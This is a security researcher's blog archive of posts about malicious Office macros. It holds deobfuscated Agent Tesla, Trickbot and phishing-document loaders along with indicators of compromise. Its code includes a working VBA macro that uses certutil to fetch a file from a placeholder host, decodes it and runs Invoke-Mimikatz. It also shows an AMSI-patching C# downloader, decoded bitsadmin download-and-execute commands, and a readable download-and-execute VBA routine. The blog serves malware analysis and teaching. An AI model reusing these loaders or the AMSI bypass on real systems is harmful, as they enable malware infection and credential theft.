neonprimetime security , just trying to help: Macro

Showing posts with label Macro. Show all posts

Thursday, January 13, 2022

VBA Macro downloader invoke-mimikatz

Shell ("certutil.exe -urlcache -split -f http://somewhere/test4.txt ""tes5.txt""")

Shell ("powershell.exe -noprofile -command ""start-sleep -s 5; $B64 = get-content 'test.txt' ; $clear = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($B64)); $clear |out-file -filepath 'test.txt';""")

Shell ("cmd.exe /c ""c:\windows\sysnative\windowspowershell\v1.0\powershell.exe -version 2 -noprofile -noexit -command ""start-sleep -s 15; iex (get-content 'test.txt'|out-string); invoke-mimikatz -command 'token::whoami';""""")

Tuesday, August 4, 2020

Agent Tesla , Doc => Powershell => C# => EXE => SMTP

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

function funcDecodeNetClassSourceCode {
 param($paramEncodedNetClassSourceCode)
 $xorKey='s7c5f8';
 $varDecodedNetClassSourceCode='';
 for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){
  $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16);
  $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]);
  # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded
  $varDecodedNetClassSourceCode+=$varDecodedChar
 }
 return $varDecodedNetClassSourceCode;
}
$varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a';
$varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode);
write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode)
# Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session
# [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class



---------------------
Results
---------------------
Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N
et;
public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string
 tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne
l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da)
;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5
cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77
9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692
2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863
d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder.
ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b
1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn
fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for
(int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le
ngth]);}return r9ef96;}}

https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/

88cd18b7fbe649bd756b3034525f34c3

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;
# [yc947f]::nf37aa() # malicious entry point
public class yc947f{
 [DllImport("kernel32",EntryPoint="GetProcAddress")]
 public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName);
 
 [DllImport("kernel32",EntryPoint="LoadLibrary")]
 public static extern IntPtr funcKernel32LoadLibrary(string paramDllName);

 [DllImport("kernel32",EntryPoint="VirtualProtect")]
 public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue);
 
 [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]
 static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes);

 public static int nf37aa(){
  # malicious entry point, patching AMSI Dll and a C# downloader
  string varDllName = funcDecodeString("125a105c485c1f5b");
  Console.WriteLine(String.Format("Dll: {0}", varDllName));
  IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName);
  if(varHandleToDll!=IntPtr.Zero){
   string varFunctionName = funcDecodeString("325a105c355b12592140005e1645");
   Console.WriteLine(String.Format("Function: {0}", varFunctionName));
   IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName);
   if(varHandleToFunction!=IntPtr.Zero){
    UIntPtr varMemorySize=(UIntPtr)5;
    uint varOldProtectValue=0;
    if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){
     Byte[] var3BytesToCopy={0x31,0xff,0x90};
     IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3);
     Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3);
     # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function
    }
   }
  }
  string varFileName = funcDecodeString("5d521b50");
  Console.WriteLine(String.Format("File: {0}", varFileName));
  string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName;
  Console.WriteLine(String.Format("Path: {0}", varFileFullPath));
  string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016");
  Console.WriteLine(String.Format("Url: {0}", varUrl));
  new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware
  ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath);
  # Process.Start(varProcessToRun); # run the malware
  return 0;
 }
 public static string funcDecodeString(string paramEncodedString){
  string varXorKey="s7c5f8";
  string varDecodedString="";
  for (int i=0; i<paramEncodedString.Length; i+=2){
   byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16);
   varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]);
  }
  return varDecodedString;
 }
}

Dll: amsi.dll
Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe
Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe

Agent Tesla

c2 terminal6.veeblehosting.com
tcp port 587

https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community

agent tesla
https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE

smtp

port 587

"terminal6.veeblehosting.com"
"obi@a-t-mould.com"
{obi@a-t-mould.com}
{obi@a-t-mould.com}

Tuesday, July 14, 2020

Excel 4.0 Macros Malware Trickbot XLMMacroDeobfuscator Walkthrough

https://app.any.run/tasks/4cce1050-b8c9-4524-bcc7-473894c29557
ac586e930dc9e191172fca28f4adfc68

excel 4.0 macros example

app.any.run says it calls out to
http://185.82.126.178/trafficdll.php

app.any.run says macros4.0

so use this
https://github.com/DissectMalware/XLMMacroDeobfuscator

open command line
navigate to python 3.6 scripts folder
execute this command
pip install XLMMacroDeobfuscator

navigate to python 3.6 scripts folder
executed this command
xlmdeobfuscator --file badfile.xls

errored out with
unexpected token Token(__ANON_0, '()') at line 1, column 11

i noticed version was
v 0.1.4

but latest is
v 0.1.5

so i re-ran pip installers directly against github to get latest
pip install -U https://github.com/DissectMalware/xlrd2/archive/master.zip
pip install -U https://github.com/DissectMalware/pyxlsb2/archive/master.zip
pip install -U https://github.com/DissectMalware/XLMMacroDeobfuscator/archive/master.zip

then re-ran command
xlmdeobfuscator --file badfile.xls

this time it worked! it spit out macro code
http://pastebin.com/raw/87NZV2Es
auto_open: auto_open->'y'!$AI$6706

CELL:AI6706 , FullEvaluation , $BZ$46254()
CELL:BZ46254 , PartialEvaluation , APP.MAXIMIZE()
CELL:BZ46255 , FullEvaluation , IF(GET.WINDOW(7.0),$GX$7042(),)
CELL:BZ46256 , FullEvaluation , IF(GET.WINDOW(20.0),,$GX$7042())
CELL:BZ46257 , FullEvaluation , IF(GET.WINDOW(23.0)<3.0,$GX$7042(),)
CELL:BZ46258 , FullEvaluation , IF(GET.WORKSPACE(31.0),$GX$7042(),)
CELL:BZ46259 , FullEvaluation , IF(GET.WORKSPACE(13.0)<770.0,$GX$7042(),)
CELL:BZ46260 , FullEvaluation , IF(GET.WORKSPACE(14.0)<390.0,$GX$7042(),)
CELL:BZ46261 , FullEvaluation , IF(GET.WORKSPACE(19.0),,$GX$7042())
CELL:BZ46262 , FullEvaluation , IF(GET.WORKSPACE(42.0),,$GX$7042())
CELL:BZ46263 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1.0))),,$GX$7042())
CELL:BZ46263 , FullEvaluation , [TRUE]
CELL:BZ46264 , FullEvaluation , $D$39031()
CELL:D39031 , FullEvaluation , SET.NAME(vkhbtqnj,)
CELL:D39032 , FullEvaluation , SET.NAME(hnjvy,$BG$50951)
CELL:D39033 , FullEvaluation , SET.NAME(niktexbrk,$GV$35265)
CELL:D39034 , FullEvaluation , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035 , FullEvaluation , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036 , FullEvaluation , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037 , PartialEvaluation , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038 , FullEvaluation , $D$39034()
CELL:D39034 , FullEvaluation , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035 , FullEvaluation , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036 , FullEvaluation , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037 , PartialEvaluation , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038 , FullEvaluation , $D$39034()
CELL:D39034 , FullEvaluation , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035 , FullEvaluation , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036 , FullEvaluation , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037 , PartialEvaluation , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038 , FullEvaluation , $D$39034()
CELL:D39034 , FullEvaluation , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035 , FullEvaluation , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036 , FullEvaluation , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037 , PartialEvaluation , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:D39038 , FullEvaluation , $D$39034()
CELL:D39034 , FullEvaluation , IF(NiktExbrK<>"gsHoGrv")
CELL:D39035 , FullEvaluation , SET.NAME(gtofvkudcpcd,NiktExbrK)
CELL:D39036 , FullEvaluation , SET.NAME(vkhbtqnj,VKHBTQnJhnjvy())
CELL:D39037 , PartialEvaluation , SET.NAME("NiktExbrK",ABSREF("R[1]C",NiktExbrK))
CELL:BZ46263 , FullEvaluation , [FALSE] $GX$7042()
CELL:GX7042 , PartialEvaluation , ALERT("This workbook is corrupted, contact the sender for further informations.")
CELL:GX7043 , End , CLOSE(FALSE)

here's an excel macro 4.0 reference book that google returned me
https://d13ot9o61jdzpp.cloudfront.net/files/Excel%204.0%20Macro%20Functions%20Reference.pdf

SET.NAME appears to assign a variable/name to a particular cell ... so just like an alias

GET.WINDOW returns data about a window, such as the alert popup box, and parameters passed can tell you data like is it hidden? is it maximized?

GET.WORKSPACE returns data about the excel workspace, such as is this macro being debugged? what is the height/width of space? is there a mouse? can it play sound? windows version?

ABSREF is absoluate reference, so references a row and column and returns the data

Interesting to see the "alert" statement
So the popup the excel doc shows when you open is just "fake", the file is not truly corrupted

I notice multiple calls to 'VKHBTQnJhnjvy()' which is not defined in the output of the python script, wonder what it is?

there are also some cells that are referenced by names/variables but not sure what the data is?
$BG$50951
$GV$35265

i open excel doc, but do not enable content
i see a sheet called 'y' on bottom (which is referenced in auto_open above)
i goto $BG$50951 it contains
RETURN(CHAR(GtOFvKUDCpcD-811)) which is a variable above

i goto $GV$35265 it contains a single integer
but numerous cells below also contain integers
http://pastebin.com/raw/Xq1Bzku9
915
927
927
923
869
858
858
860
867
864
857
867
861
857
860
861
865
857
860
866
867
858
927
925
908
913
913
916
910
911
919
919
857
923
915
923

if i subtract the 811 number in the 1st cell from each of these cells, then convert the integers to ascii, this looks like a url
e.g. 915 - 811 = 104 which is 'h' for the 1st letter

VALUE MINUS 811 TO CHAR
915 104 h
927 116 t
927 116 t
923 112 p
869 58 :
858 47 /
858 47 /
860 49 1
867 56 8
864 53 5
857 46 .
867 56 8
861 50 2
857 46 .
860 49 1
861 50 2
865 54 6
857 46 .
860 49 1
866 55 7
867 56 8
858 47 /
927 116 t
925 114 r
908 97 a
913 102 f
913 102 f
916 105 i
910 99 c
911 100 d
919 108 l
919 108 l
857 46 .
923 112 p
915 104 h
923 112 p

Which ends up being
http://185.82.126.178/trafficdll.php

Which Urlhaus indicates downloaded Trickbot on a certain date
https://urlhaus.abuse.ch/url/406715/

Friday, November 9, 2018

VBA Macro Print Variable to Body

If you're debugging malicious macros in word documents using the Developer tab, sometimes you may get the urge to print out the contents of a variable to a Message Box

MsgBox(evilvariable)

The problem is , message boxes get truncated if the variable is too long and you can't easily copy & paste the contents into a text editor for example.

Thus I've found a better solution is to overwrite the body of the word document like so

ActiveDocument.Content = evilvariable

Works great, now you can view it and all copy & paste out to a text editor!

Wednesday, June 7, 2017

De-obfuscating Macro from Phish Email

Saw this word doc in an email

Virus Total link

MD5 8cd6cee9d328a0c0fa8d5ddb150cd5e9

Email Subject: XXXX Credit Card Authorization Form

It contained macros that were obfuscated, partial example is below

Sub AutoOpen()
eculso = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
eculso = ekkule(eculso, ".")
resultString2 = ynoqa(eculso)

....

The string eculso clearly contained the malicious command to be run, so I removed the "run" commands in vb and created a de-obfuscate function reversing their vba code.

Public Function deobfuscate(obfuscated_command)
pass1 = Join(Split(obfuscated_command, "."), "%%")
still_obfuscated_command = Split(Trim(pass1), "%")
resultstr = ""
For counter = 0 To UBound(still_obfuscated_command)
   If Len(still_obfuscated_command(counter)) > 0 Then
    rotate_pass2 = CInt((still_obfuscated_command(counter))) + 10
    rotate_pass3 = Chr((rotate_pass2 + 2) + 2)
    converted_string = Array(resultstr, rotate_pass3)
    resultstr = Join(converted_string, "")
   End If
Next
deobfuscate = resultstr
End Function

Private Sub Document_Open()
obfuscated_command = "85.95.86.32.87.106.87.18.33.85.18.20.105.83.91.102.88.97.100.18.33.102.18.40.18.97.96.91.92.103.18.24.18.84.91.102.101.83.86.95.91.96.18.33.102.100.83.96.101.88.87.100.18.103.102.91.105.98.107.18.33.86.97.105.96.94.97.83.86.18.33.98.100.91.97.100.91.102.107.18.96.97.100.95.83.94.18.90.102.102.98.44.33.33.98.98.87.98.98.87.98.98.87.102.107.32.85.97.95.33.102.102.102.33.36.96.97.100.87.96.32.87.106.87.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.18.24.101.102.83.100.102.18.23.83.98.98.86.83.102.83.23.78.107.96.87.96.95.32.87.106.87.20"
actual_command = deobfuscate(obfuscated_command)
InputBox "malcode", "infosec", actual_command
End Sub

Which results in the malicious command printed to the a popup for me to view

cmd.exe /c "waitfor /t 6 oniju & bitsadmin /transfer utiwpy /download /priority normal hxxp://ppeppeppety[.]com/ttt/2noren.exe %appdata%\ynenm.exe &start %appdata%\ynenm.exe"

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, June 7, 2016

Understanding VBA from an Invoice Email

This malicious email contained a microsoft word attachment with VB code in it. Here is a link to the full original macro code.

SUBJECT: RECONFIRM INVOICE
ATTACHMENT: RECONFIRM INVOICE.doc

The code was interesting because it seemed amateurish in terms of it's obfuscation. Sure there were tons of random looking letters, variable names, etc. But in general, this was poorly obfuscated, if at all. Here are a few examples:

Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask

The above variable was used for doing bitwise masking of a string value, yet the attacker literally named it "HighMask" so you know exactly what it's used for.

Public Function Encode64(sString As String) As String

The above function literally performs base64 encoding of a string, so the name Encode64 makes sense and makes life simpler for the security researcher.

Public Sub Wipedir(pppppppppppppppppppppppppp As String)

The above function Wipredir calls the VBA deletefolder method in it, so again it's clearly deleting the evidence afterwards, thus the obfuscation here is poor.

So de-obfuscating this was quite simple then. One of the easier ways to quickly de-obfuscate VBA code like this is to put it into a word document, comment out the malicious lines, replace them with MsgBox statements, and execute the code, let the code do the work for you. For example:

Comment out this code with a tick

'MkDir (decryptString(Encode64(b)))

And replace it with this code

MsgBox ("MkDir=" + decryptString(Encode64(b)))

Comment out this code with a tick

'ChDrive (vEnd988888527)

And replace it with this code

MsgBox ("ChDrive=" + vEnd988888527)

Comment out this code with a tick

'Open vEnd3491963883 For Binary As vEnd1400215006

And replace it with this code

MsgBox ("OpenFile=" + vEnd3491963883)

Comment out this code with a tick

' OBsGG = Shell(vbHH, 1)

And replace it with this code

MsgBox ("Shell=" + vbHH)

Comment out this code with a tick

'OOO.deletefolder pppppppppppppppppppppppppp

And replace it with this code

MsgBox ("deletefolder=" + pppppppppppppppppppppppppp)

And like magic, you'll get a bunch of message boxes that tell you exactly what this code is trying to do. In this case
1.) Create a new folder C:\ProgramData\Memsys
2.) Navigate to that folder C:\ProgramData\Memsys
3.) Open and Write to a file C:\ProgramData\Memsys\ms.exe
4.) Execute that file from the command prompt C:\ProgramData\Memsys\ms.exe
5.) Delete that folder C:\ProgramData\Memsys

Of course always do this in a sandbox, not connected to the Internet, in case you accidentally execute malicious code that you didn't mean to and infect yourself.

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Wednesday, January 20, 2016

Dridex 120205 Letter-response A3 2-2 Tim@plan4print.co.uk

Dridex email with VBA Macro Microsoft Word attachment seen this morning.

Attachment was 120205 Letter-response A3 2-2.doc
sender Tim Speed
Subject Emailing: 120205 Letter-response A3 2-2
callouts to hxxp://www.lassethoresen.com

dynamoo blogs a bit about it here

More about neonprimetime

Top Blogs of all-time

Top Github Contributions

Qualys Scantronitor 2.0

Tuesday, November 10, 2015

De-Obfuscate URL from Evil VBA Macro

Here's a quick run-down of how I manually de-Obfuscated a URL from Evil VBA Macro.

First I was looking at this evil VBA Macro, but it's obfuscated and difficult to determine what it's doing. After crawling the VBA for a bit I noticed this line

Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")

Which looks like it's trying to create an Activex object to browse a url. A bit later I see this code.

jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
jsonParseString.Send

Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice though the URL is obfuscated, it's just a function call Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing characters in the url).

solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)

And then I see Redistribute is a function that likely converts those integers to the actual url.

Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
Dim n As Integer
For n = LBound(Z) To UBound(Z)
Redistribute = Redistribute & Chr(Z(n) - 8 * oldLen - 4444)
Next n
End Function

Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code. Rename a few variables so it makes more sense to me. Add a MsgBox to the end of the code. Drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my url.

Dim oldLen As Integer
oldLen = 35
Dim decodeURLFunction As String
Dim encodedUrl() As Variant
encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
Dim n As Integer
For n = LBound(encodedUrl) To UBound(encodedUrl)
decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
Next n
MsgBox decodeURLFunction

Of course always do this in a lab, a safe environment. Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects because then evil things may happen on your lab box. Instead just ensure it's a bunch of string concatenation, character conversions, etc. and then add a safe MsgBox to pop up a message box with your info you wanted.

Friday, April 24, 2015

Pull Macro out of XLS with oledump

I hope you're enjoying following my ride along as I learn sometimes new things, sometimes simpler better more efficient ways to do things. I previously blogged about extracting macros, and well I have stumbled across a quicker method. Didier again has a great tool, oledump.py which can make it really simple.

1.) See all the objects of an Office Doc (note "M" means macros are in that object)
oledump.py Test.xls

1: 107 '\x01CompObj'
2: 564 '\x05DocumentSummaryInformation'
3: 224 '\x05SummaryInformation'
4: 16529 'Workbook'
5: 525 '_VBA_PROJECT_CUR/PROJECT'
6: 104 '_VBA_PROJECT_CUR/PROJECTwm'
7: m 985 '_VBA_PROJECT_CUR/VBA/Sheet1'
8: m 985 '_VBA_PROJECT_CUR/VBA/Sheet2'
9: m 985 '_VBA_PROJECT_CUR/VBA/Sheet3'
10: M 2014 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
11: 2695 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
12: 1383 '_VBA_PROJECT_CUR/VBA/__SRP_0'
13: 114 '_VBA_PROJECT_CUR/VBA/__SRP_1'
14: 572 '_VBA_PROJECT_CUR/VBA/__SRP_2'
15: 140 '_VBA_PROJECT_CUR/VBA/__SRP_3'
16: 552 '_VBA_PROJECT_CUR/VBA/dir'

2.) EXTRACT THE MACRO from object #10
oledump.py -s 10 -v Test.xls

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
MsgBox ("Test")
End Sub

That was simple.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Tuesday, April 7, 2015

De-Obfuscated Malicious VBA Macro

I posted an obfuscated malicious VBA script for in a Word Document that was disguised as a Resume in a phishing email.

It was obfuscated meaning that the attacker took time to randomize the code, change variables names and declarations to be confusing, add extra unnecessary code that just confuses you, etc.

I took the time then to de-obfuscate or turn it back into read-able code that a normal legit developer might write. Let's quickly attempt to review it.

#If Win64 Then
Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#Else
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#End If

First, the above code declares a reference or gives the program a way to execute shell command line statements by declaring an alias for the shell32.dll's ShellExecuteA function. Now you can pass in the code you want to run and it will execute (assuming the user opening this document has access to do so).

Sub Document_Open()
DownloadAndExecute
End Sub

Call a Function called 'DownloadAndExecute' that will run immediately when the Word document is opened (assuming Macros are enabled).

Sub DownloadAndExecute()

Declare that Function called 'DownloadAndExecute' so when the document opens it can be called.

Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
Dim maliciousFileLocation = Environ("tmp\df.exe")

Declare variables that store where I'm doing to download a file from and where I'm going to save it to/execute it from. Note this is only going to work if the user can access that website (Cross your fingers and hope that your internet filter/proxy blocks it) and that the user can save and execute files from the folder (likely yes since it's the a temp folder).

Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
XMLHttpRequestObject.Open "GET", PayloadUrl, False
XMLHttpRequestObject.send

Make a call out to the Internet to download the malicious executable file using the XML Http Request object and an HTTP GET request.

If XMLHttpRequestObject.Status = 200 Then

If the download was successful proceed to the next steps.

   Dim fileId = FreeFile
   Open maliciousFileLocation For Binary As #fileId
   Put #fileId, , XMLHttpRequestObject.responseBody
   Close #fileId
End If

Save the results of the download to the location you specified earlier.

ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
End Sub

Execute the file that you just downloaded and saved. Of course the goods are actually in that executable, so you'd want to download and analyze that file at some point as well.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Resume Phish with VBA Macro in Word

I pasted some details about a Phishing email that I saw containing a Resume in a Microsoft Word document. If users clicked on the word document it executed some malicious VBA scripts that attempted to download a file and infect the host workstation. What are the steps to determine all that?

